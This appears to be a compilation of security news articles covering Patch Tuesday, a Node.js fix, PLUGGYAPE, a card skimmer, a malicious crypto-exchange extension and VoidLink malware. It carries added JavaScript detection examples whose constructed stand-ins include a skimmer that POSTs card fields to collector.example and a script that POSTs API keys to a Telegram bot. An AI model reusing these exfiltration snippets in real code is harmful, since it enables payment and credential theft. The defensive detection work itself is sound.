2. Implement Automated Monitoring
Deploy runtime monitoring for:
- Sensitive field access detection (cards, SSNs, credentials)
- Real-time alerts for unauthorized collection
- CSP violation tracking
3. Address the Marketing-IT Divide
Joint CISO + CMO review:
- Marketing tools in payment frames
- Facebook Pixel scoping (use Allow/Exclusion Lists)
- Tracker ROI vs. security risk
Download the Full Report
Get the complete 43-page analysis, including:
✅ Sector-by-sector risk breakdowns
✅ Complete list of high-risk third-party apps
✅ Year-over-year trend analysis
✅ Security leaders best practices
This article is a contributed piece from one of our valued partners.
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Microsoft Fixes 114 Windows Flaws in January 2026 Patch, One Actively Exploited
Microsoft on Tuesday rolled out its first security update for 2026, addressing 114 security flaws, including one vulnerability that it said has been actively exploited in the wild. Of the 114 flaws, eight are rated Critical and 106 are rated Important in severity. As many as 58 vulnerabilities have been classified as privilege escalation, followed by 22 information disclosure, 21 remote code execution, and five spoofing flaws. According to data collected by Fortra, the update marks the third-largest January Patch Tuesday after January 2025 and January 2022.
These patches are in addition to two security flaws that Microsoft has addressed in its Edge browser since the release of the December 2025 Patch Tuesday update, including a spoofing flaw in its Android app (CVE-2025-65046, CVSS score: 3.1) and a case of insufficient policy enforcement in Chromium's WebView tag (CVE-2026-0628, CVSS score: 8.8). The vulnerability that has come under in-the-wild exploitation is CVE-2026-20805 (CVSS score: 5.5), an information disclosure flaw in the Desktop Window Manager (DWM). The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) have been credited with identifying and reporting the flaw. “Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager (DWM) allows an authorized attacker to disclose information locally,” Microsoft said in an advisory.
“The type of information that could be disclosed if an attacker successfully exploited this vulnerability is a section address from a remote ALPC port, which is user-mode memory.” There are currently no details on how the vulnerability is being exploited, the scale of such efforts, and who may be behind the activity. “DWM is responsible for drawing everything on the display of a Windows system, which means it offers an enticing combination of privileged access and universal availability, since just about any process might need to display something,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “In this case, exploitation leads to improper disclosure of an ALPC port section address, which is a section of user-mode memory where Windows components coordinate various actions between themselves.” Microsoft previously addressed an actively exploited zero-day flaw in DWM in May 2024 ( CVE-2024-30051 , CVSS score: 7.8), which was described as a privilege escalation flaw that was abused by multiple threat actors, in connection with the distribution of QakBot and other malware families. Satnam Narang, senior staff research engineer at Tenable, called DWM a “frequent flyer” on Patch Tuesday, with 20 CVEs patched in the library since 2022.
Jack Bicer, director of vulnerability research at Action1, said the vulnerability can be exploited by a locally authenticated attacker to disclose information and defeat address space layout randomization (ASLR) and other defenses. “Vulnerabilities of this nature are commonly used to undermine Address Space Layout Randomization (ASLR), a core operating system security control designed to protect against buffer overflows and other memory-manipulation exploits,” Kev Breen, senior director of cyber threat research at Immersive, told The Hacker News. “By revealing where code resides in memory, this vulnerability can be chained with a separate code execution flaw, transforming a complex and unreliable exploit into a practical and repeatable attack.” The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the latest fixes by February 3, 2026.
Another vulnerability of note is a security feature bypass tied to Secure Boot certificate expiration (CVE-2026-21265, CVSS score: 6.4) that could allow an attacker to undermine a crucial security mechanism that ensures firmware modules come from a trusted source and prevents malware from running during the boot process. In November 2025, Microsoft announced that three Windows Secure Boot certificates issued in 2011 will expire starting in June 2026, urging customers to update to their 2023 counterparts:
- Microsoft Corporation KEK CA 2011 (expires June 2026), replaced by Microsoft Corporation KEK 2K CA 2023 (for signing updates to DB and DBX)
- Microsoft Windows Production PCA 2011 (expires October 2026), replaced by Windows UEFI CA 2023 (for signing the Windows boot loader)
- Microsoft UEFI CA 2011 (expires June 2026), replaced by Microsoft UEFI CA 2023 (for signing third-party boot loaders) and Microsoft Option ROM UEFI CA 2023 (for signing third-party option ROMs)

“Secure Boot certificates used by most Windows devices are set to expire starting in June 2026. This might affect the ability of certain personal and business devices to boot securely if not updated in time,” Microsoft said. “To avoid disruption, we recommend reviewing the guidance and taking action to update certificates in advance.” The Windows maker also pointed out that the latest update removes the Agere Soft Modem drivers “agrsm64.sys” and “agrsm.sys” that shipped natively with the operating system.
The third-party drivers are susceptible to a two-year-old local privilege escalation flaw ( CVE-2023-31096 , CVSS score: 7.8) that could allow an attacker to gain SYSTEM permissions. In October 2025, Microsoft took steps to remove another Agere Modem driver called “ltmdm64.sys” following in-the-wild exploitation of a privilege escalation vulnerability ( CVE-2025-24990 , CVSS score: 7.8) that could permit an attacker to gain administrative privileges. Also high on the priority list should be CVE-2026-20876 (CVSS score: 6.7), a critical-rated privilege escalation flaw in Windows Virtualization-Based Security (VBS) Enclave, enabling an attacker to obtain Virtual Trust Level 2 (VTL2) privileges, and leverage it to subvert security controls, establish deep persistence, and evade detection. “It breaks the security boundary designed to protect Windows itself, allowing attackers to climb into one of the most trusted execution layers of the system,” Mike Walters, president and co-founder of Action1, said.
“Although exploitation requires high privileges, the impact is severe because it compromises virtualization-based security itself. Attackers who already have a foothold could use this flaw to defeat advanced defenses, making prompt patching essential to maintain trust in Windows security boundaries.”

Software Patches from Other Vendors

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including: ABB, Adobe, Amazon Web Services, AMD, Arm, ASUS, Broadcom (including VMware), Cisco, ConnectWise, Dassault Systèmes, D-Link, Dell, Devolutions, Drupal, Elastic, F5, Fortinet, Fortra, Foxit Software, FUJIFILM, Gigabyte, GitLab, Google Android and Pixel, Google Chrome, Google Cloud, Grafana, Hikvision, HP, HP Enterprise (including Aruba Networking and Juniper Networks), IBM, Imagination Technologies, Lenovo, Linux distributions (AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu), MediaTek, Mitel, Mitsubishi Electric, MongoDB, Moxa, Mozilla Firefox and Firefox ESR, n8n, NETGEAR, Node.js, NVIDIA, ownCloud, QNAP, Qualcomm, Ricoh, Samsung, SAP, Schneider Electric, ServiceNow, Siemens, SolarWinds, SonicWall, Sophos, Spring Framework, Synology, TP-Link, Trend Micro, and Veeam.
Critical Node.js Vulnerability Can Cause Server Crashes via async_hooks Stack Overflow
Node.js has released updates to fix what it described as a critical security issue impacting “virtually every production Node.js app” that, if successfully exploited, could trigger a denial-of-service (DoS) condition. “Node.js/V8 makes a best-effort attempt to recover from stack space exhaustion with a catchable error, which frameworks have come to rely on for service availability,” Node.js’s Matteo Collina and Joyee Cheung said in a Tuesday bulletin. “A bug that only reproduces when async_hooks are used would break this attempt, causing Node.js to exit with 7 directly without throwing a catchable error when recursions in user code exhaust the stack space. This makes applications whose recursion depth is controlled by unsanitized input vulnerable to denial-of-service attacks.” At its core, the shortcoming stems from the fact that Node.js exits with code 7 (denoting an Internal Exception Handler Run-Time Failure ) instead of gracefully handling the exception when a stack overflow occurs in user code while async_hooks is enabled.
async_hooks is a low-level Node.js API that allows developers to track the lifecycle of asynchronous resources, such as database queries, timers, or HTTP requests. The issue, Node.js said, impacts several frameworks and Application Performance Monitoring (APM) tools, including React Server Components, Next.js, Datadog, New Relic, Dynatrace, Elastic APM, and OpenTelemetry, owing to their use of AsyncLocalStorage, a component built atop the async_hooks module that makes it possible to store data throughout the lifetime of an asynchronous operation. It has been addressed in the following versions:
- Node.js 20.20.0 (LTS)
- Node.js 22.22.0 (LTS)
- Node.js 24.13.0 (LTS)
- Node.js 25.3.0 (Current)

The problem also impacts all Node.js versions from 8.x, the first release line to ship async_hooks, through 18.x. Node.js 8.0.0, codenamed Carbon, was released on May 30, 2017.
However, these versions remain unpatched as they have reached end-of-life (EoL) status. The fix detects stack overflow errors and re-throws them to user code instead of treating them as fatal. This is being tracked under the CVE identifier CVE-2025-59466 (CVSS score: 7.5). Despite the significant practical impact, Node.js said it is treating the fix as a mitigation rather than a full security fix, for three reasons:
- Stack space exhaustion is not part of the ECMAScript specification
- The V8 JavaScript engine does not treat it as a security issue
- Limitations of the “uncaughtException” handler, which is designed as a last-resort mechanism for exception handling

“Although it is a bug fix for an unspecified behavior, we chose to include it in the security release because of its widespread impact on the ecosystem,” Node.js said.
“React Server Components, Next.js, and virtually every APM tool are affected. The fix improves developer experience and makes error handling more predictable.” In light of the severity of the vulnerability, users of the affected frameworks and tools, as well as hosting providers, are advised to update as soon as possible. Library and framework maintainers are advised to add more robust defenses against stack space exhaustion to ensure service availability. The disclosure comes as Node.js also released fixes for three other high-severity flaws (CVE-2025-55131, CVE-2025-55130, and CVE-2025-59465) that could be exploited to achieve data leakage or corruption, read sensitive files using crafted relative symbolic link (symlink) paths, and trigger a remote denial-of-service, respectively.
PLUGGYAPE Malware Uses Signal and WhatsApp to Target Ukrainian Defense Forces
The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of new cyber attacks targeting the country's defense forces with malware known as PLUGGYAPE between October and December 2025. The activity has been attributed with medium confidence to a Russian hacking group tracked as Void Blizzard (aka Laundry Bear or UAC-0190). The threat actor is believed to have been active since at least April 2024. Attack chains distributing the malware use the instant messaging apps Signal and WhatsApp as delivery vectors: the threat actors masquerade as charity organizations to convince targets to click a seemingly harmless link (“harthulp-ua[.]com” or “solidarity-help[.]org”) impersonating the charity and download a password-protected archive.
The archives contain an executable created with PyInstaller that ultimately leads to the deployment of PLUGGYAPE. CERT-UA said successive iterations of the backdoor have added obfuscation and anti-analysis checks that prevent the artifacts from running in a virtual environment. Written in Python, PLUGGYAPE communicates with a remote server over WebSocket or Message Queuing Telemetry Transport (MQTT), allowing the operators to execute arbitrary code on compromised hosts. Support for MQTT was added in December 2025.
In addition, the command-and-control (C2) addresses are retrieved from external paste services such as rentry[.]co and pastebin[.]com, where they are stored in base64-encoded form, as opposed to directly hard-coding the domain in the malware itself. This gives attackers the ability to maintain operational security and resilience, allowing them to update the C2 servers in real-time in scenarios where the original infrastructure is detected and taken down. “Initial interaction with the target of a cyber attack is increasingly carried out using legitimate accounts and phone numbers of Ukrainian mobile operators, with the use of the Ukrainian language, audio and video communication, and the attacker may demonstrate detailed and relevant knowledge about the individual, organization, and its operations,” CERT-UA said. “Widely used messengers available on mobile devices and personal computers are de facto becoming the most common channel for delivering software tools for cyber threats.” In recent months, the cybersecurity agency has also revealed that a threat cluster tracked as UAC-0239 sent phishing emails from UKR[.]net and Gmail addresses containing links to a VHD file (or directly as an attachment) that paves the way for a Go-based stealer named FILEMESS that collects files matching certain extensions and exfiltrates them to Telegram.
Also dropped is an open-source C2 framework called OrcaC2 that enables system manipulation, file transfer, keylogging, and remote command execution. The activity is said to have targeted Ukrainian defense forces and local governments. Educational institutions and state authorities in Ukraine have also been at the receiving end of another spear-phishing campaign, orchestrated by UAC-0241, that leverages ZIP archives containing a Windows shortcut (LNK) file which, when opened, triggers the execution of an HTML Application (HTA) using “mshta.exe.” The HTA payload, in turn, launches JavaScript designed to download and execute a PowerShell script, which then delivers the open-source tool LaZagne to recover stored passwords and a Go backdoor codenamed GAMYBEAR that receives and executes commands from a server and transmits the results back, Base64-encoded, over HTTP.
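Two detections derived from the PLUGGYAPE tradecraft above, added here as an example and not CERT-UA's tooling: recovering base64-encoded WebSocket/MQTT C2 URLs from a paste body, and correlating a paste-service fetch with a follow-on MQTT-port or WebSocket connection from the same host. The paste body, the flow-log format and lines, the 10-minute window and the documentation-range IPs are all constructed assumptions.

```javascript
// Added example, not CERT-UA's tooling: two detections built from the
// PLUGGYAPE tradecraft (C2 address fetched base64-encoded from a paste
// service, then WebSocket or MQTT to the C2). All inputs are constructed.
const PASTE_SERVICES = new Set(['rentry.co', 'pastebin.com']);
const C2_SCHEMES = new Set(['ws:', 'wss:', 'mqtt:', 'mqtts:']);
const MQTT_PORTS = new Set([1883, 8883]);
const WINDOW_MS = 10 * 60 * 1000;   // paste fetch -> C2 connect window (assumption)

// 1) Recover C2 endpoints from a paste: base64 tokens that decode to a
//    WebSocket or MQTT URL, the two transports PLUGGYAPE uses.
function extractC2FromPaste(body) {
  const found = [];
  for (const token of body.match(/[A-Za-z0-9+/]{16,}={0,2}/g) || []) {
    const text = Buffer.from(token, 'base64').toString('utf8').trim();
    try {
      const u = new URL(text);
      if (C2_SCHEMES.has(u.protocol)) found.push(u.href);
    } catch { /* token did not decode to a URL; ignore */ }
  }
  return found;
}

// 2) Correlate flows per source host: a paste-service fetch followed within
//    WINDOW_MS by an MQTT-port or WebSocket connection is the staging pattern.
//    Assumed line format: "<iso-timestamp> <src> <dst> <dst-port> <app>"
function parseFlow(line) {
  const [ts, src, dst, port, app] = line.trim().split(/\s+/);
  return { ts: Date.parse(ts), src, dst, port: Number(port), app };
}

function correlate(lines) {
  const flows = lines.filter((l) => l.trim()).map(parseFlow).sort((a, b) => a.ts - b.ts);
  const lastPasteFetch = new Map();    // src -> timestamp of most recent paste fetch
  const alerts = [];
  for (const f of flows) {
    if (PASTE_SERVICES.has(f.dst)) { lastPasteFetch.set(f.src, f.ts); continue; }
    const t0 = lastPasteFetch.get(f.src);
    const c2Like = MQTT_PORTS.has(f.port) || f.app === 'websocket';
    if (t0 !== undefined && c2Like && f.ts - t0 <= WINDOW_MS) {
      alerts.push({ src: f.src, dst: `${f.dst}:${f.port}`, app: f.app, secondsAfterPaste: (f.ts - t0) / 1000 });
    }
  }
  return alerts;
}

// Constructed paste: benign filler plus two encoded endpoints.
const SAMPLE_PASTE = [
  'Charity update December 2025',
  Buffer.from('wss://203.0.113.10:8443/socket').toString('base64'),
  'thanks for your support',
  Buffer.from('mqtt://198.51.100.7:1883').toString('base64'),
].join('\n');

// Constructed flow log: host .5 fetches a paste and opens a WebSocket 3 s later;
// host .9 fetches a paste but connects 85 min later; host .12 never touches a paste.
const SAMPLE_FLOWS = `
2025-12-03T10:00:01Z 10.0.0.5 rentry.co 443 https
2025-12-03T10:00:04Z 10.0.0.5 203.0.113.10 8443 websocket
2025-12-03T10:05:00Z 10.0.0.9 pastebin.com 443 https
2025-12-03T11:30:00Z 10.0.0.9 198.51.100.7 1883 mqtt
2025-12-03T10:07:00Z 10.0.0.12 198.51.100.7 1883 mqtt
`.split('\n');

console.log(extractC2FromPaste(SAMPLE_PASTE));
console.log(correlate(SAMPLE_FLOWS));
```

Only 10.0.0.5 alerts; the other two hosts each show half of the pattern. Because the paste URL is the stable part of this design, the paste-service fetch from a host that has no business reason to reach rentry.co is itself worth a lower-severity alert, and the decoded C2 list feeds straight into egress blocking.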
Long-Running Web Skimming Campaign Steals Credit Cards From Online Checkout Pages
Cybersecurity researchers have discovered a major web skimming campaign that has been active since January 2022, targeting several major payment networks like American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. “Enterprise organizations that are clients of these payment providers are the most likely to be impacted,” Silent Push said in a report published today. Digital skimming attacks refer to a category of client-side attacks in which bad actors compromise legitimate e-commerce sites and payment portals to inject malicious JavaScript code that’s capable of stealthily harvesting credit card information and other personal information when unsuspecting users attempt to make a payment on checkout pages. These attacks are classified under an umbrella term called Magecart , which initially referred to a coalition of cybercriminal groups that targeted e-commerce sites using the Magento software, before diversifying to other products and platforms.
Silent Push said it discovered the campaign after analyzing a suspicious domain linked to a now-sanctioned bulletproof hosting provider Stark Industries (and its parent company PQ.Hosting), which has since rebranded to THE[.]Hosting, under the control of the Dutch entity WorkTitans B.V., as a sanctions evasion measure. The domain in question, cdn-cookie[.]com, has been found to host highly obfuscated JavaScript payloads (e.g., “recorder.js” or “tab-gtm.js”) that are loaded by web shops to facilitate credit card skimming. The skimmer comes with features to evade detection by site administrators. Specifically, it checks the Document Object Model (DOM) tree for an element named “ wpadminbar ,” a reference to a toolbar that appears in WordPress websites when logged-in administrators or users with appropriate permissions are viewing the site.
If the “wpadminbar” element is present, the skimmer initiates a self-destruct sequence and removes itself from the web page. An attempt to run the skimmer is made every time the page's DOM is modified, which happens routinely as users interact with the page. That's not all. The skimmer also checks whether Stripe was selected as the payment option and, if so, whether a key named “wc_cart_hash” exists in the browser's localStorage; the skimmer itself creates that key and sets it to “true” once a victim has been successfully skimmed.
The absence of this flag causes the skimmer to render a fake Stripe payment form that replaces the legitimate form through user interface manipulations, thereby tricking the victims into entering their credit card numbers, along with the expiration dates and Card Verification Code (CVC) numbers. “As the victim entered their credit card details into a fake form instead of the real Stripe payment form, which was initially hidden by the skimmer when they initially filled it out, the payment page will display an error,” Silent Push said. “This makes it appear as if the victim had simply entered their payment details incorrectly.” The data stolen by the skimmer extends beyond payment details to include names, phone numbers, email addresses, and shipping addresses. The information is eventually exfiltrated by means of an HTTP POST request to the server “lasorie[.]com.” Once the data transmission is complete, the skimmer erases traces of itself from the checkout page, removing the fake payment form that was created and restoring the legitimate Stripe input form.
It then sets “wc_cart_hash” to “true” to prevent the skimmer from being run a second time on the same victim. “This attacker has advanced knowledge of WordPress’s inner workings and integrates even lesser-known features into their attack chain,” Silent Push said.
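An added example (not Silent Push's tooling) of triaging checkout-page JavaScript against the behaviours described above: the wpadminbar check, the wc_cart_hash localStorage flag, DOM-mutation triggering, Stripe and card-field targeting, self-removal, and a POST to a host that is neither first-party nor a known payment host. SUSPECT_SCRIPT is a constructed stand-in that mimics only those indicators, not the real skimmer; the hostnames and the scoring weights are assumptions.

```javascript
// Added example, not from the Silent Push report: static triage scorer for
// scripts loaded on checkout pages, keyed to the skimmer behaviours described
// in the report. SUSPECT_SCRIPT is a constructed stand-in, not the skimmer.
const INDICATORS = [
  { id: 'admin-evasion',         weight: 3, re: /wpadminbar/ },
  { id: 'already-skimmed-flag',  weight: 3, re: /wc_cart_hash/ },
  { id: 'dom-mutation-trigger',  weight: 1, re: /MutationObserver|DOMSubtreeModified/ },
  { id: 'stripe-targeting',      weight: 2, re: /stripe/i },
  { id: 'card-field-access',     weight: 2, re: /\bcvc\b|card[_-]?number|exp(?:iry|_month|_year)/i },
  { id: 'self-removal',          weight: 2, re: /\.remove\(\)|removeChild\(/ },
  { id: 'post-exfil',            weight: 2, re: /method\s*:\s*['"]POST['"]|\.open\(\s*['"]POST/ },
];
// Hosts a Stripe checkout is expected to talk to (example allowlist; extend per site).
const KNOWN_PAYMENT_HOSTS = new Set(['js.stripe.com', 'api.stripe.com']);

function sameSite(host, first) { return host === first || host.endsWith('.' + first); }

// Every absolute http(s) URL literal in the script, reduced to unique hostnames.
function literalHosts(src) {
  const hosts = (src.match(/https?:\/\/[A-Za-z0-9.-]+/g) || []).map((u) => new URL(u).hostname);
  return [...new Set(hosts)];
}

function scoreScript(src, { scriptUrl, firstPartyHost }) {
  const matched = INDICATORS.filter((i) => i.re.test(src));
  const reasons = matched.map((i) => i.id);
  let score = matched.reduce((sum, i) => sum + i.weight, 0);

  const scriptHost = new URL(scriptUrl).hostname;
  if (!sameSite(scriptHost, firstPartyHost)) { score += 1; reasons.push(`third-party-origin:${scriptHost}`); }

  // A POST target that is neither the shop nor the payment processor is the exfil path.
  const unknown = literalHosts(src).filter((h) => !sameSite(h, firstPartyHost) && !KNOWN_PAYMENT_HOSTS.has(h));
  if (unknown.length) { score += 3; reasons.push(`unknown-endpoint:${unknown.join(',')}`); }

  const verdict = score >= 8 ? 'block' : score >= 4 ? 'review' : 'ok';
  return { score, verdict, reasons };
}

// Constructed stand-in exhibiting the indicators; the field values are placeholders.
const SUSPECT_SCRIPT = `
(function () {
  if (document.getElementById('wpadminbar')) { document.currentScript.remove(); return; }
  new MutationObserver(function () {
    if (localStorage.getItem('wc_cart_hash') === 'true') return;
    if (!document.querySelector('#payment_method_stripe:checked')) return;
    var fields = { number: '[card_number]', exp: '[expiry]', cvc: '[cvc]' };
    fetch('https://collector.example/c', { method: 'POST', body: JSON.stringify(fields) });
  }).observe(document.documentElement, { childList: true, subtree: true });
})();`;

const BENIGN_SCRIPT = `
document.querySelectorAll('.faq-item').forEach(function (el) {
  el.addEventListener('click', function () { el.classList.toggle('open'); });
});`;

function demo() {
  return {
    suspect: scoreScript(SUSPECT_SCRIPT, { scriptUrl: 'https://cdn-cookie.example/recorder.js', firstPartyHost: 'shop.example' }),
    benign: scoreScript(BENIGN_SCRIPT, { scriptUrl: 'https://shop.example/js/faq.js', firstPartyHost: 'shop.example' }),
  };
}

console.log(demo());
```

The stand-in scores 19 (block) and the benign script 0. Obfuscated payloads like the real “recorder.js” will not match string indicators until deobfuscated, so run this over the decoded source; the host-based checks (third-party origin, POST target outside the shop and processor) survive obfuscation better than the string ones and are the part to keep even if the weights change.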
Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool
Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that’s capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries , while masquerading as a tool to automate trading on the platform. The extension, named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads and is still available on the Chrome Web Store as of writing. It was first published on September 1, 2025, by a developer named “jorjortan142.” “The extension programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor,” Socket security researcher Kirill Boychenko said in an analysis. According to the Chrome Web Store listing, the web browser add-on is described as an extension that “simplifies connecting your trading bot to the MEXC exchange” by generating the API keys with the necessary permissions on the management page, including to facilitate trading and withdrawals.
In doing so, the installed extension enables a threat actor to control any MEXC account accessed from the compromised browser, allowing them to execute trades, perform automated withdrawals, and even drain the wallets and balances reachable through the service. “In practice, as soon as the user navigates to MEXC’s API management page, the extension injects a single content script, script.js, and begins operating inside the already authenticated MEXC session,” Socket added. To achieve this, the extension checks if the current URL contains the string “/user/openapi,” which refers to the API key management page . The script then programmatically creates a new API key and ensures that withdrawal capability is enabled.
At the same time, it tampers with the page’s user interface to give the impression to the user that the withdrawal permission has been disabled. As soon as the process to generate the Access Key and Secret Key is complete, the script extracts both the values and transmits them to a hard-coded Telegram bot under the threat actor’s control using an HTTPS POST request. The threat poses a severe risk, as it remains active as long as the keys are valid and not revoked, granting the attackers unfettered access to the victim’s account even if they end up uninstalling the extension from the Chrome browser. “In effect, the threat actor uses the Chrome Web Store as the delivery mechanism, the MEXC web UI as the execution environment, and Telegram as the exfiltration channel,” Boychenko noted.
“The result is a purpose-built credential-stealing extension that targets MEXC API keys at the moment they are created and configured with full permissions.” The attack is made possible by the fact that it leverages an already authenticated browser session to realize its goals, thereby obviating the need for obtaining a user’s password or bypassing authentication protections. It’s currently not clear who is behind the operation, but a reference to “jorjortan142” points to an X handle with the same name that links to a Telegram bot named SwapSushiBot, which is also promoted across TikTok and YouTube . The YouTube channel was created on August 17, 2025. “By hijacking a single API workflow inside the browser, threat actors can bypass many traditional controls and go straight for long lived API keys with withdrawal rights,” Socket said.
“The same playbook can be readily adapted to other exchanges, DeFi dashboards, broker portals, and any web console that issues tokens in session, and future variants are likely to introduce heavier obfuscation, request broader browser permissions, and bundle support for multiple platforms into a single extension.”
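An added example, not Socket's analysis code, of what to look for when auditing an unpacked extension against the pattern above: a content script scoped to an exchange's API-key management page, overly broad host permissions, and URL literals in the script that point outside the sites it is declared to run on (the Telegram exfiltration channel in this case). The manifest and script.js are constructed stand-ins, not the MEXC API Automator's files; WATCHED_HOSTS and the path hints are assumptions.

```javascript
// Added example, not Socket's tooling: audits an unpacked extension's
// manifest.json and content script for the pattern above. Both files below
// are constructed stand-ins; WATCHED_HOSTS and KEY_PAGE_HINTS are assumptions.
const WATCHED_HOSTS = ['mexc.com', 'exchange.example'];                         // sessions you care about
const KEY_PAGE_HINTS = [/\/user\/openapi/, /api[-_]?key/i, /api[-_]?management/i]; // hypothetical path hints
const BROAD_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Chrome match pattern: <scheme>://<host>/<path>; host may be "*" or "*.domain".
function parseMatchPattern(pattern) {
  const m = /^(\*|https?|wss?|file|ftp):\/\/([^/]+)(\/.*)$/.exec(pattern);
  return m ? { host: m[2], path: m[3] } : null;
}

function hostMatches(patternHost, host) {
  if (patternHost === '*') return true;
  if (patternHost.startsWith('*.')) return host === patternHost.slice(2) || host.endsWith(patternHost.slice(1));
  return host === patternHost;
}

function auditManifest(manifest) {
  const findings = [];
  const matchedHosts = [];
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) {
      if (BROAD_PATTERNS.has(pattern)) {
        findings.push({ severity: 'medium', detail: `content script injected into every site (${pattern})` });
        matchedHosts.push('*');
        continue;
      }
      const parsed = parseMatchPattern(pattern);
      if (!parsed) continue;
      matchedHosts.push(parsed.host);
      for (const h of WATCHED_HOSTS) {
        if (hostMatches(parsed.host, h) && KEY_PAGE_HINTS.some((re) => re.test(parsed.path))) {
          findings.push({ severity: 'high', detail: `${(cs.js || []).join(',')} runs on ${h} API-key page (${pattern})` });
        }
      }
    }
  }
  const grants = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  if (grants.some((p) => BROAD_PATTERNS.has(p))) findings.push({ severity: 'medium', detail: 'broad host permissions' });
  return { findings, matchedHosts };
}

// Any URL literal in the content script whose host is outside the pages it is
// declared to run on is a candidate exfiltration endpoint.
function findForeignEndpoints(scriptSource, matchedHosts) {
  const hosts = (scriptSource.match(/https?:\/\/[A-Za-z0-9.-]+/g) || []).map((u) => new URL(u).hostname);
  return [...new Set(hosts)].filter((h) => !matchedHosts.some((ph) => hostMatches(ph, h)));
}

// Constructed manifest: tightly scoped, which is exactly what makes it look harmless.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Hypothetical Exchange Helper',
  permissions: ['storage'],
  host_permissions: ['https://*.mexc.com/*'],
  content_scripts: [{ matches: ['https://*.mexc.com/user/openapi*'], js: ['script.js'], run_at: 'document_idle' }],
};
// Constructed content script; the bot token is a placeholder.
const SAMPLE_CONTENT_SCRIPT = `
if (location.pathname.startsWith('/user/openapi')) {
  // (drives the key-creation UI here)
  fetch('https://api.telegram.org/bot<token>/sendMessage', { method: 'POST', body: JSON.stringify({ text: keyAndSecret }) });
}`;

function demo() {
  const { findings, matchedHosts } = auditManifest(SAMPLE_MANIFEST);
  return { findings, foreignEndpoints: findForeignEndpoints(SAMPLE_CONTENT_SCRIPT, matchedHosts) };
}

console.log(demo());
```

Note that the sample needs no broad permissions at all: a content script on one page plus a cross-origin fetch to an API that allows it is enough, which is why the manifest-level "reads all websites" heuristic alone would miss it. Because the stolen keys outlive the extension, the response on a compromised machine is to revoke every API key on the exchange, not merely to uninstall.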
[Webinar] Securing Agentic AI: From MCPs and Tool Access to Shadow API Key Sprawl
AI agents are no longer just writing code. They are executing it. Tools like Copilot, Claude Code, and Codex can now build, test, and deploy software end-to-end in minutes. That speed is reshaping engineering—but it’s also creating a security gap most teams don’t see until something breaks.
Behind every agentic workflow sits a layer few organizations are actively securing: Model Context Protocol (MCP) servers. These servers quietly decide what an AI agent can run, which tools it can call, which APIs it can access, and what infrastructure it can touch. Once that control plane is compromised or misconfigured, the agent doesn’t just make mistakes; it acts with authority. Ask the teams impacted by CVE-2025-6514.
One flaw turned a trusted OAuth proxy used by more than 500,000 developers into a remote code execution path. No exotic exploit chain. No noisy breach. Just automation doing exactly what it was allowed to do—at scale.
That incident made one thing clear: if an AI agent can execute commands, it can also execute attacks. This webinar is for teams who want to move fast without giving up control. Secure your spot for the live session ➜ Led by the author of the OpenID whitepaper Identity Management for Agentic AI , this session goes straight to the core risks security teams are now inheriting from agentic AI adoption. You’ll see how MCP servers actually work in real environments, where shadow API keys appear, how permissions quietly sprawl, and why traditional identity and access models break down when agents act on your behalf.
You’ll learn:
- What MCP servers are and why they matter more than the model itself
- How malicious or compromised MCP servers turn automation into an attack surface
- Where shadow API keys come from, and how to detect and eliminate them
- How to audit agent actions and enforce policy before deployment
- Practical controls to secure agentic AI without slowing development

Agentic AI is already inside your pipeline. The only question is whether you can see what it’s doing and stop it when it goes too far. Register for the live webinar and regain control of your AI stack before the next incident does it for you. Register for the Webinar ➜
This article is a contributed piece from one of our valued partners.
New Advanced Linux VoidLink Malware Targets Cloud and Container Environments
Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink that is specifically designed for long-term, stealthy access to Linux-based cloud environments. According to a new report from Check Point Research, the cloud-native Linux malware framework comprises an array of custom loaders, implants, rootkits, and modular plugins that let its operators augment or change its capabilities over time and pivot when objectives change. It was first discovered in December 2025. “The framework includes multiple cloud-focused capabilities and modules, and is engineered to operate reliably in cloud and container environments over extended periods,” the cybersecurity company said in an analysis published today. “VoidLink’s architecture is extremely flexible and highly modular, centered around a custom Plugin API that appears to be inspired by Cobalt Strike’s Beacon Object Files (BOF) approach.
This API is used in more than 30+ plug-in modules available by default.” The findings reflect a shift in threat actors’ focus from Windows to Linux systems that have emerged as the bedrock of cloud services and critical operations. Actively maintained and evolving, VoidLink is assessed to be the handiwork of China-affiliated threat actors. A cloud-first implant written in the Zig programming language, the toolkit can detect major cloud environments, viz. Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Alibaba, and Tencent, and adapt its behavior if it recognizes that it’s running within a Docker container or a Kubernetes pod.
It can also gather credentials associated with cloud environments and popular source code version control systems such as Git.

[Figure: VoidLink high-level overview]

The targeting of these services indicates that VoidLink is likely engineered to target software developers, either to steal sensitive data or to leverage the access for supply chain attacks. Some of its other capabilities are listed below:
- Rootkit-like features using LD_PRELOAD, loadable kernel modules (LKM), and eBPF to hide its processes, chosen according to the Linux kernel version
- An in-memory plugin system for extending functionality
- Support for varied command-and-control (C2) channels, such as HTTP/HTTPS, WebSocket, ICMP, and DNS tunneling
- The ability to form a peer-to-peer (P2P) or mesh-style network between compromised hosts
